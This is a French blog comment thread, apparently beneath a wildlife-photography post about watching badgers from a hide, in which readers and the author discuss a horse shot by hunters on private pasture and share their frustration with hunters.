    J'aime beaucoup ton article et le suivant pour la suite de l'affût ! Je te remercie beaucoup, je vais donc aller voir la suite. J'ai le coeur qui saigne quand je lis que le cheval a été blessé par les chasseurs et qu'on a dû l'euthanasier alors qu'il ne demandait rien, il était dans une propriété, c'est très triste de ne pas pouvoir protéger des chevaux chez soi. Bon week end et bisous.

    63
    Dimanche 20 Octobre à 08:41

    c'est terrible cette histoire de cheval blessé (volontairement ?) par des chasseurs alors qu'il se trouvait paisiblement en pâture
    C'est aussi tout de même incroyable qu'en vertu des demandes par la proprietaire des lieux que lors des périodes de chasse ces prairies puisent être "empruntées" par les chasseurs . Quand au propriétaire des animaux qui pourraient s'y trouver ; à lui de faire en sorte de les mettre à l'abri ? Alors qu'ils se trouvent dans SA propriété ?

    J'ai lu aussi avec intérêt le récit de la préparation de ta chasse aux images :D

      • Dimanche 20 Octobre à 09:40

        Délibérément ou pas, là je ne saurai répondre, mais j'ai été confrontée à des chasseurs dans les enclos de mes chevaux quand j'étais dans le Gard et les en faire sortir n'a pas été mince affaire. S'en est suivi des menaces bien évidemment.
        Ce genre d'histoire n'es pas si exceptionnelle qu'on peut l'envisager (à savoir un cheval retrouvé tué par des balles sur SOB terrain et clos). Il y en a eu une il n'y a pas si longtemps avec pétition à l'appui.
        Je crois qu'il y a une histoire de chemins communaux qui pose problème pour passer les terrains en réserve de chasse...
        Eh oui, on tolère tout pour les chasseurs, même qu'ils tuent des vies humaines...
        Bonne journée

    64
    Vendredi 25 Octobre à 12:43

    Bonjour Pascale,
    Superbe reportage concernant la préparation de l'affût et la vie des blaireaux.
    Je ne doute pas que vous les ayez vus ;)
    Je continue ...



    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :